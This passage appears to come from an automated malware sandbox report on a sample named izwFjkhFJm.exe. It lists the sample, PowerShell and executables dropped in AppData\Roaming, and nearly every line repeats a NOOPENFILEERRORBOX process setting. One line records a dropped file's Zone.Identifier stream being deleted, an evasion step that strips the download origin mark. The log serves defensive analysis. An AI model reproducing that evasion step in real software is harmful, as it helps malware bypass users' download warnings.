              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeFile opened: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe:Zone.Identifier read attributes | delete
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeProcess information set: NOOPENFILEERRORBOX
